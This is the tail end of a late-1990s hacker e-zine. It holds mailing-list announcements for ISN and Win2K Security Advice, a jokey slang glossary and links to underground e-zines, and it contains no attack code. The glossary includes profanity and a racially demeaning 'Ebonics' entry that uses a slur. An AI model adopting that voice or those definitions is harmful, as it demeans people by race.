Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM> From: mea culpa <jericho@DIMENSIONAL.COM> Subject: Where has ISN been? Comments: To: InfoSec News <isn@securityfocus.com> To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. Win2k Security Advice Mailing List (new added Nov 30th) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net. To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec ============== NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list. While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors. SAVE THIS INFO FOR YOUR REFERENCE: To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net Regards, Steve Manzuik, List Moderator Win2K Security Advice steve@win2ksecadvice.net @HWA A.9 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. A.11 NEW Underground E-Zines ~~~~~~~~~~~~~~~~~~~~~~~ InET.......................... http://www.warpedreality.com/inet Hack In the Box............... http://www.thelimit.net/hitb Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt DataZine...................... http://www.tdcore.com Napalm........................ http://napalm.firest0rm.org/ Digital Defiance.............. http://www.hackers.cx @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]